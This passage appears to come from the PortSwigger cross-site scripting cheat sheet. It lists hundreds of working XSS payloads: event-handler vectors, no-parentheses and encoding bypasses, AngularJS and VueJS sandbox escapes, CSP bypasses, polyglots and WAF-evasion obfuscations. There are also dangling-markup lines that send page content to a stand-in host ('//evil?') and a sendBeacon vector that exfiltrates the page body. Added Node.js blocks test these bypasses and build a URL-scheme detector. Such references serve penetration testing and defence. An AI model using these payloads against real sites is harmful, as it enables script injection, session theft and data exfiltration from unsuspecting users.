onpagehide | Fires when the page is changed | <body onpagehide=navigator.sendBeacon('https://ssl.portswigger-labs.net/',document.body.innerHTML)>
onpaste | Requires you to paste a piece of text | <a onpaste=alert(1) contenteditable>test</a>
onpause | Requires clicking the element to pause | <audio autoplay controls onpause=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onpointerdown | Fires on mouse down | <xss onpointerdown=alert(1)>XSS</xss>
onpointerenter | Fires when the mouse enters the element | <xss onpointerenter=alert(1)>XSS</xss>
onpointerleave | Fires when the mouse leaves the element | <xss onpointerleave=alert(1)>XSS</xss>
onpointermove | Fires when the mouse moves | <xss onpointermove=alert(1)>XSS</xss>
onpointerout | Fires when the mouse moves out of the element | <xss onpointerout=alert(1)>XSS</xss>
onpointerover | Fires when the mouse moves over the element | <xss onpointerover=alert(1)>XSS</xss>
onpointerrawupdate | Fires when the pointer changes | <xss onpointerrawupdate=alert(1)>XSS</xss>
onpointerup | Fires on mouse up | <xss onpointerup=alert(1)>XSS</xss>
onreset | Requires a click | <form onreset=alert(1)><input type=reset>
onsearch | Fires when a form is submitted and the input has a type attribute of search | <form><input type=search onsearch=alert(1) value="Hit return" autofocus>
onseeked | Requires clicking the element timeline | <audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onseeking | Requires clicking the element timeline | <audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onselect | Requires you to select text | <input onselect=alert(1) value="XSS" autofocus>
onselectionchange | Fires when the text selection on the page changes | <body onselectionchange=alert(1)>select some text
onselectstart | Fires when beginning a text selection | <body onselectstart=alert(1)>select some text
onshow | Fires when the context menu is shown | <div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>
onsubmit | Requires a form submission | <form onsubmit=alert(1)><input type=submit>
ontouchend | Fires when a touch ends (touch-screen mobile devices only) | <body ontouchend=alert(1)>
ontouchmove | Fires when a touch moves (touch-screen mobile devices only) | <body ontouchmove=alert(1)>
ontouchstart | Fires when a touch starts (touch-screen mobile devices only) | <body ontouchstart=alert(1)>
onvolumechange | Requires a volume adjustment | <audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onwheel | Fires when you use the mouse wheel | <body onwheel=alert(1)>

Restricted characters

No parentheses, using exception handling
<script>onerror=alert;throw 1</script>

No parentheses, using exception handling, no semicolons
<script>{onerror=alert}throw 1</script>

No parentheses, using exception handling, no semicolons, using expressions
<script>throw onerror=alert,1</script>

No parentheses, using exception handling and eval
<script>throw onerror=eval,'=alert\x281\x29'</script>

No parentheses, using exception handling and eval on Firefox
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>

No parentheses, using ES6 hasInstance and instanceof with eval
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>

No parentheses, using ES6 hasInstance and instanceof with eval, without dots
<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>

No parentheses, using location redirect
<script>location='javascript:alert\x281\x29'</script>

No parentheses, using location redirect, no strings
<script>location=name</script>

No parentheses, using template strings
<script>alert`1`</script>

No parentheses, using template strings and location hash
<script>new Function`X${document.location.hash.substr`1`}`</script>

No parentheses or spaces, using template strings and location hash
<script>Function`X${document.location.hash.substr`1`}```</script>
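The three techniques above that depend on nothing browser-specific (the tagged template call, the Symbol.hasInstance trick and the tagged Function constructor) can be exercised in Node.js. The block below is an added example, not part of the PortSwigger cheat sheet: it installs a recording stub as the global alert(), and the document stand-in and the sample hash value are assumptions of the demo, not anything on the page.

```javascript
// Added example, not from the PortSwigger cheat sheet: the no-parentheses
// techniques above that need nothing browser-specific, run in Node.js against a
// recording stub installed as the global alert(). The stub, the `document`
// stand-in and the sample location.hash value are assumptions of this demo.
const calls = [];
globalThis.alert = (...args) => { calls.push(args.map(String).join(',')); };

// alert`1`: a tagged template calls the tag function with the strings array
// (["1"]), so alert runs although the source contains no "(" or ")".
function viaTaggedTemplate() {
  calls.length = 0;
  alert`1`;
  return calls[0];
}

// 'alert\x281\x29' instanceof {[Symbol.hasInstance]: eval}: instanceof hands the
// left operand to the right operand's Symbol.hasInstance handler, here eval,
// which runs the string "alert(1)". The parentheses exist only as the \x28 and
// \x29 escapes inside the string literal, never as source characters.
function viaHasInstance() {
  calls.length = 0;
  'alert\x281\x29' instanceof { [Symbol.hasInstance]: eval };
  return calls[0];
}

// new Function`X${body}`: tagging Function turns the template into
// Function(["X",""], body); the last argument is the function body and `new`
// runs the freshly built function. document.location.hash.substr`1` strips the
// leading "#" with another tagged call (["1"] coerces to 1).
function viaTaggedFunctionConstructor(hash) {
  calls.length = 0;
  const document = { location: { hash } };   // constructed stand-in for the DOM
  new Function`X${document.location.hash.substr`1`}`;
  return calls[0];
}
```

Each helper returns the string the stub received, so the same file doubles as a quick way to confirm a JavaScript engine honours a given trick before relying on it in a payload.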

Frameworks

Bootstrap onanimationstart event
<xss class=progress-bar-animated onanimationstart=alert(1)>

Bootstrap ontransitionend event
<xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>

Protocols

Iframe src attribute with JavaScript protocol
<iframe src="javascript:alert(1)">

Object data attribute with JavaScript protocol
<object data="javascript:alert(1)">

Embed src attribute with JavaScript protocol
<embed src="javascript:alert(1)">

A standard JavaScript protocol link
<a href="javascript:alert(1)">XSS</a>

The protocol is not case sensitive
<a href="JaVaScript:alert(1)">XSS</a>

Characters \x01-\x20 are allowed before the protocol
<a href=" javascript:alert(1)">XSS</a>

Characters \x09, \x0a and \x0d are allowed inside the protocol (the vector contains a literal tab)
<a href="javas	cript:alert(1)">XSS</a>

Characters \x09, \x0a and \x0d are allowed after the protocol name, before the colon (the vector contains a literal tab)
<a href="javascript	:alert(1)">XSS</a>

xlink namespace inside SVG with JavaScript protocol
<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>

SVG animate tag using values
<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

SVG animate tag using from and to
<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>

SVG set tag
<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

Data protocol inside script src
<script src="data:text/javascript,alert(1)"></script>

SVG script href attribute without closing script tag
<svg><script href="data:text/javascript,alert(1)" />

SVG use element (Chrome/Firefox)
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>

Import statement with data URL
<script>import('data:text/javascript,alert(1)')</script>

Base tag with JavaScript protocol rewriting relative URLs
<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>

MathML makes any tag clickable
<math><x href="javascript:alert(1)">blah

Button and formaction
<form><button formaction=javascript:alert(1)>XSS

Input and formaction
<form><input type=submit formaction=javascript:alert(1) value=XSS>

Form and action
<form action=javascript:alert(1)><input type=submit value=XSS>

Use element with an external URL
<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>

Animate tag with keytimes and multiple values
<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>

Other useful attributes

Using the srcdoc attribute
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

Using srcdoc with entities
<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>

Click a submit element from anywhere on the page, even outside the form
<form action=javascript:alert(1)><input type=submit id=x></form><label for=x>XSS</label>

Hidden inputs: accesskey attributes can enable XSS on normally unexploitable elements (press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)
<input type="hidden" accesskey="X" onclick="alert(1)">

Link elements: accesskey attributes can enable XSS on normally unexploitable elements (press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)
<link rel="canonical" accesskey="X" onclick="alert(1)" />

The download attribute can save a copy of the current web page
<a href=# download="filename.html">Test</a>

Disable the referrer using referrerpolicy
<img referrerpolicy="no-referrer" src="//portswigger-labs.net">

Set window.name via a parameter of the window.open function
<a href=# onclick="window.open('http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//','alert(1)')">XSS</a>

Set window.name via the name attribute of an <iframe> tag
<iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></iframe>

Set window.name via the target attribute of a <base> tag
<base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>

Set window.name via the target attribute of an <a> tag
<a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in a tag</a>

Set window.name via the usemap attribute of an <img> tag
<img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></map>

Set window.name via the target attribute of a <form> tag
<form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS via target in a form"></form>

Set window.name via the formtarget attribute of an <input> tag of type submit
<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>

Set window.name via the formtarget attribute of an <input> tag of type image
<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input name=1 type="image" src="validimage.png" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>

Special tags

Redirect to a different domain
<meta http-equiv="refresh" content="0; url=//portswigger-labs.net">

Meta charset attribute, UTF-7
<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Meta Content-Type charset, UTF-7
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (have to be at the start of the document) 1
+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (have to be at the start of the document) 2
+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (have to be at the start of the document) 3
+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (have to be at the start of the document) 4
+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Upgrade insecure requests
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">

Disable JavaScript via iframe sandbox
<iframe sandbox src="//portswigger-labs.net"></iframe>

Disable the referrer
<meta name="referrer" content="no-referrer">

Encoding

Overlong UTF-8 (each line is the byte sequence for "<" encoded in two to six bytes)
\xC0\xBCscript>alert(1)</script>
\xE0\x80\xBCscript>alert(1)</script>
\xF0\x80\x80\xBCscript>alert(1)</script>
\xF8\x80\x80\x80\xBCscript>alert(1)</script>
\xFC\x80\x80\x80\x80\xBCscript>alert(1)</script>

Unicode escapes
<script>\u0061lert(1)</script>

Unicode escapes, ES6 style
<script>\u{61}lert(1)</script>

Unicode escapes, ES6 style, zero padded
<script>\u{0000000061}lert(1)</script>

Hex encoding, JavaScript escapes
<script>eval('\x61lert(1)')</script>

Octal encoding
<script>eval('\141lert(1)')</script>
<script>eval('alert(\061)')</script>
<script>eval('alert(\61)')</script>

Decimal encoding with optional semicolon
<a href="&#106;avascript:alert(1)">XSS</a>
<a href="&#106avascript:alert(1)">XSS</a>

SVG script with HTML encoding
<svg><script>&#97;lert(1)</script></svg>
<svg><script>&#x61;lert(1)</script></svg>
<svg><script>alert&NewLine;(1)</script></svg>
<svg><script>x="&quot;,alert(1)//";</script></svg>

Decimal encoding with padded zeros
<a href="&#0000106avascript:alert(1)">XSS</a>

Hex encoding entities
<a href="&#x6a;avascript:alert(1)">XSS</a>

Hex encoding without a semicolon, provided the next character is not a-f0-9 (the second and third vectors terminate the reference with a literal tab and a literal newline, which the URL parser then strips from the scheme)
<a href="j&#x61vascript:alert(1)">XSS</a>
<a href="&#x6a	avascript:alert(1)">XSS</a>
<a href="&#x6a
avascript:alert(1)">XSS</a>

Hex encoding with padded zeros
<a href="&#x0000006a;avascript:alert(1)">XSS</a>

Hex encoding is not case sensitive
<a href="&#X6A;avascript:alert(1)">XSS</a>

HTML entities
<a href="javascript&colon;alert(1)">XSS</a>
<a href="java&Tab;script:alert(1)">XSS</a>
<a href="java&NewLine;script:alert(1)">XSS</a>
<a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>

URL encoding
<a href="javascript:x='%27-alert(1)-%27'">XSS</a>

HTML entities and URL encoding
<a href="javascript:x='&percnt;27-alert(1)-%27'">XSS</a>
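The Protocols and Encoding rows all defeat the same mistake: checking the raw attribute text for "javascript:" before the browser has decoded character references and applied the URL parser's whitespace and case leniency. The following is an added example, not part of the PortSwigger cheat sheet, of doing the check in the browser's order. The named-entity table is deliberately limited to the names used on this page (a real implementation needs the full HTML5 table), and the sample attribute values are constructed from the rows above.

```javascript
// Added example, not from the PortSwigger cheat sheet: decodes an href the way a
// browser does before the scheme is compared, so the entity, case and
// whitespace tricks in the Protocols and Encoding rows cannot hide a
// javascript: URL. NAMED_REFS is limited to the names this page uses; a real
// implementation needs the full HTML5 named-character-reference table.
const NAMED_REFS = {
  colon: ':', Tab: '\t', NewLine: '\n', lpar: '(', rpar: ')', percnt: '%',
  sol: '/', semi: ';', lt: '<', gt: '>', quot: '"', amp: '&',
};

// Numeric references end at the first non-digit whether or not a ";" follows
// (&#106; &#106avascript &#x6a &#X6A &#0000106), so the semicolon is optional
// for them; named references must be terminated to decode.
function decodeEntities(value) {
  return value.replace(/&#([xX][0-9a-fA-F]+|[0-9]+);?|&([A-Za-z]+);/g, (m, num, name) => {
    if (num !== undefined) {
      const cp = /^[xX]/.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
      return cp > 0x10ffff ? '\ufffd' : String.fromCodePoint(cp); // out of range -> U+FFFD
    }
    return Object.prototype.hasOwnProperty.call(NAMED_REFS, name) ? NAMED_REFS[name] : m;
  });
}

// The URL parser strips leading and trailing C0 controls and spaces, removes
// every tab, LF and CR anywhere in the input, and compares the scheme
// case-insensitively: exactly the leniencies the Protocols rows rely on.
function schemeOf(url) {
  const cleaned = url.replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '').replace(/[\t\n\r]/g, '');
  const m = /^([A-Za-z][A-Za-z0-9+.-]*):/.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

function isJavaScriptUrl(attrValue) {
  return schemeOf(decodeEntities(attrValue)) === 'javascript';
}

// A check that looks only at the raw attribute text, for comparison.
function naiveCheck(attrValue) {
  return attrValue.toLowerCase().startsWith('javascript:');
}

// Constructed sample attribute values, one per row above, plus a benign control.
const SAMPLES = [
  'javascript:alert(1)',
  'JaVaScript:alert(1)',
  ' javascript:alert(1)',
  'javas\tcript:alert(1)',
  '&#106avascript:alert(1)',
  '&#x6a\tavascript:alert(1)',
  '&#X6A;avascript:alert(1)',
  '&#0000106avascript:alert(1)',
  'java&Tab;script:alert(1)',
  'javascript&colon;alert&lpar;1&rpar;',
  'https://portswigger.net/',
];

// Returns, per sample, what the naive check and the normalising check decide.
function compare() {
  return SAMPLES.map((v) => ({ value: v, naive: naiveCheck(v), normalised: isJavaScriptUrl(v) }));
}
```

Run compare() to see the split: the naive check flags only the two samples that literally begin with the scheme, while the normalising check flags every JavaScript URL in the list and nothing else. Note that an inner space (as in "j avascript:") is not stripped by the URL parser, so it correctly stays unflagged; only tab, LF and CR are removed.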

Obfuscation

Data protocol inside script src with base64
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>

Data protocol inside script src with base64 and HTML entities
<script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>

Data protocol inside script src with base64 and URL encoding
<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>

Iframe srcdoc, HTML encoded
<iframe srcdoc="&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;"></iframe>

Iframe JavaScript URL with HTML and URL encoding
<iframe src="javascript:&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;"></iframe>

SVG script with unicode escapes and HTML encoding
<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>

Client-side template injection

VueJS reflected

Version | Author | Length | Vector
All versions | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
All versions | Mario Heiderich (Cure53) & Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google) | 62 | <div v-html="''.constructor.constructor('alert(1)')()">a</div>
All versions | Gareth Heyes (PortSwigger) | 39 | <x v-html=_c.constructor('alert(1)')()>
All versions | Peter af Geijerstam (Swedish Shellcode Factory) | 37 | <x v-if=_c.constructor('alert(1)')()>

AngularJS sandbox escapes, reflected

Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
1.0.1 - 1.1.5 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
1.2.0 - 1.2.1 | Jan Horn (Google) | 122 | {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5 | Gareth Heyes (PortSwigger) | 23 | {{{}.")));alert(1)//"}}
1.2.6 - 1.2.18 | Jan Horn (Google) | 106 | {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 124 | {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1.2.24 - 1.2.29 | Gareth Heyes (PortSwigger) | 23 | {{{}.")));alert(1)//"}}
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 23 | {{{}.")));alert(1)//"}}
1.3.0 | Gábor Molnár (Google) | 272 |
{{!ready && (ready = true) && (
  !call
  ? $$watchers[0].get(toString.constructor.prototype)
  : (a = apply) &&
    (apply = constructor) &&
    (valueOf = call) &&
    (''+''.toString(
      'F = Function.prototype;' +
      'F.apply = F.a;' +
      'delete F.a;' +
      'delete F.valueOf;' +
      'alert(1);'
    ))
);}}
1.3.3 - 1.3.18 | Gareth Heyes (PortSwigger) | 128 | {{{}[{'toString':[].join,'length':1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}
1.3.19 | Gareth Heyes (PortSwigger) | 102 | {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}
1.3.20 | Gareth Heyes (PortSwigger) | 65 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9 | Gareth Heyes (PortSwigger) | 74 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8 | Ian Hickey & Gareth Heyes (PortSwigger) | 79 | {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}
1.5.9 - 1.5.11 | Jan Horn (Google) | 517 |
{{
    c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
    c.$apply=$apply;c.$eval=b;op=$root.$$phase;
    $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
    C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
    B=C(b,c,b);$evalAsync("
    astNode=pop();astNode.type='UnaryExpression';
    astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
    astNode.argument={type:'Identifier',name:'foo'};
    ");
    m1=B($$asyncQueue.pop().expression,null,$root);
    m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
    $eval('a(b.c)');[].push.apply=a;
}}
>=1.6.0 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
>=1.6.0 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}

DOM-based AngularJS sandbox escapes (using orderBy or no $eval)

Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.2.0 - 1.2.18 | Jan Horn (Google) | 118 | a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 119 | toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
1.2.24 - 1.2.26 | Gareth Heyes (PortSwigger) | 317 | {}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 20 | {}.")));alert(1)//";
1.4.0 - 1.4.5 | Gareth Heyes (PortSwigger) | 75 | 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
>=1.6.0 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.4.4 (without strings) | Gareth Heyes (PortSwigger) | 134 | toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)

AngularJS CSP bypasses

Version | Author | Length | Vector
All versions (Chrome) | Gareth Heyes (PortSwigger) | 81 | <input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
All versions (Chrome), shorter | Gareth Heyes (PortSwigger) | 56 | <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
All versions (all browsers), shorter | Gareth Heyes (PortSwigger) | 91 | <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190 | <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
All versions (Chrome), shorter, via oncut | Savan Gadhiya (NotSoSecure) | 49 | <input ng-cut=$event.path|orderBy:'(y=alert)(1)'>

Scriptless attacks

Dangling markup

Background attribute
<body background="//evil?
<table background="//evil?
<table><thead background="//evil?
<table><tbody background="//evil?
<table><tfoot background="//evil?
<table><td background="//evil?
<table><th background="//evil?

Link href stylesheet
<link rel=stylesheet href="//evil?

Link href icon
<link rel=icon href="//evil?

Meta refresh
<meta http-equiv="refresh" content="0; http://evil?

Img, to pass markup through the src attribute
<img src="//evil?
<image src="//evil?

Video using the track element
<video><track default src="//evil?

Video using the source element and src attribute
<video><source src="//evil?

Audio using the source element and src attribute
<audio><source src="//evil?

Input src
<input type=image src="//evil?

Button using formaction
<form><button style="width:100%;height:100%" type=submit formaction="//evil?

Input using formaction
<form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?

Form using action
<button form=x style="width:100%;height:100%;"><form id=x action="//evil?

Object data
<object data="//evil?

Iframe src
<iframe src="//evil?

Embed src
<embed src="//evil?

Use textarea to consume markup and post it to an external site
<form><button formaction=//evil>XSS</button><textarea name=x>

Pass markup data through window.name using form target
<button form=x>XSS</button><form id=x action=//evil target="

Pass markup data through window.name using base target
<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="

Pass markup data through window.name using formtarget
<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="

Using base href to pass data
<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/

Using embed window name to pass data from the page
<embed src="http://subdomain1.portswigger-labs.net/dangling_markup/name.html" name="

Using iframe window name to pass data from the page
<iframe src="http://subdomain1.portswigger-labs.net/dangling_markup/name.html" name="

Using object window name to pass data from the page
<object data="http://subdomain1.portswigger-labs.net/dangling_markup/name.html" name="

Using frame window name to pass data from the page
<frameset><frame src="http://subdomain1.portswigger-labs.net/dangling_markup/name.html" name="

Overwrite the type attribute with image in hidden inputs
<input type=hidden type=image src="//evil?

Polyglots

Polyglot payload 1
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Polyglot payload 2
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

Polyglot payload 3
javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>

WAF bypass global objects

Each vector below is shown with window; the same vector works unchanged with self, this, top, parent, frames and globalThis in place of window, since all of them reference the global object.

XSS into a JavaScript string, string concatenation
window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, comment syntax
window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, hex escape sequence
window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence and base64 encoded string
window['\x65\x76\x61\x6c'](window['\x61\x6c\x65\x72\x74'](window['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, octal escape sequence
window['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, unicode escape
window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, RegExp source property
window[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, Hieroglyphy/JSFuck
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
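Every row above resolves, at runtime, to the same property lookups on the global object, which is why a WAF rule matching the literal text alert( or document.domain sees none of them. The block below is an added example, not part of the PortSwigger cheat sheet: it evaluates one vector per family against a mock window in Node.js and records what the stub alert() receives. The mock, its sample domain and the recorded-call list are assumptions of the demo; new Function() is used only because the inputs are the page's own payloads.

```javascript
// Added example, not from the PortSwigger cheat sheet: evaluates the obfuscated
// global-object vectors above against a mock window in Node.js to show that
// every spelling ends in the same alert(document.domain) call. The mock, its
// sample domain and the recorded-call list are assumptions of this demo.
const seen = [];
const win = {
  alert: (msg) => { seen.push(String(msg)); },
  document: { domain: 'example.test' },   // constructed sample value
  atob: (b64) => Buffer.from(b64, 'base64').toString('latin1'),
  eval: () => undefined,   // the hex+base64 vector wraps alert() in eval(); a no-op is enough here
};

// Bind every alias the cheat sheet uses to the same object: window, self, top,
// parent, frames and globalThis as parameters, `this` via .call(). A Function()
// body is sloppy-mode code, which the octal escapes (\141 ...) require.
function runVector(vector) {
  seen.length = 0;
  const fn = new Function('window', 'self', 'top', 'parent', 'frames', 'globalThis', vector);
  fn.call(win, win, win, win, win, win, win);
  return seen.slice();
}

// One vector per obfuscation family, each using a different alias. The source
// strings are double-escaped so the generated code itself contains \x61, \141 etc.
const VECTORS = {
  concat:      "window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])",
  comment:     "self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])",
  hex:         "this['\\x61\\x6c\\x65\\x72\\x74'](this['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e'])",
  hexBase64:   "top['\\x65\\x76\\x61\\x6c'](top['\\x61\\x6c\\x65\\x72\\x74'](top['\\x61\\x74\\x6f\\x62']('WFNT')))",
  octal:       "parent['\\141\\154\\145\\162\\164']('\\130\\123\\123')",
  unicode:     "frames['\\u0061\\u006c\\u0065\\u0072\\u0074']('\\u0058\\u0053\\u0053')",
  regexSource: "globalThis[/al/.source+/ert/.source](/XSS/.source)",
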